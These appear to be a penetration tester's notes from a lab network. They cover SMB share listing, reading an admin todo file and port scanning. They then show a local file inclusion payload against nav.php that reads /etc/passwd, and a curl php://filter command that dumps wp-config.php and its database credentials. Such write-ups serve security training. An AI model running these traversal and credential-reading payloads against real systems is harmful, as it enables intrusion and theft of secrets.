SMB 172.16.1.10 445 DANTE-NIX02 ----- ----------- ------
SMB 172.16.1.10 445 DANTE-NIX02 print$ Printer Drivers
SMB 172.16.1.10 445 DANTE-NIX02 SlackMigration READ
SMB 172.16.1.10 445 DANTE-NIX02 IPC$ IPC Service (DANTE-NIX02 server (Samba, Ubuntu))
Shares information
impacket-smbclient 172.16.1.10 -port 445
use Slackmigration
cat admintasks.txt-Remove wordpress install from web root - PENDING -Reinstate Slack integration on Ubuntu machine - PENDING -Remove old employee accounts - COMPLETE -Inform Margaret of the new changes - COMPLETE -Remove account restrictions on Margarets account post-promotion to admin - PENDING
What do I think
I do remember that todos find in the NIX01 said that patch LFI from other website. I checked the website and changing the tabs showed me that there is a LFI. Here it says remove the wordpress install from the webroot so I might find creds there. Margaret is a new account.
Rustscan
Open 172.16.1.10:22
Open 172.16.1.10:80
Open 172.16.1.10:139
Open 172.16.1.10:445LFI
So the following link gives me the LFI
http://172.16.1.10/nav.php?page=../../../../var/www/html/../../../etc/passwdAs mentioned in the txt file there is still configuration of wordpress on the server. The php file can not be accessed directly so I need to use the php filter for it.
curl http://172.16.1.10/nav.php?page=php://filter/convert.base64-encode/resource=../../../../../var/www/html/wordpress/wp-config.php | base64 -d
Output
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME' 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'margaret' );
/** MySQL database password */
define( 'DB_PASSWORD', 'Welcome1!2@3#' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );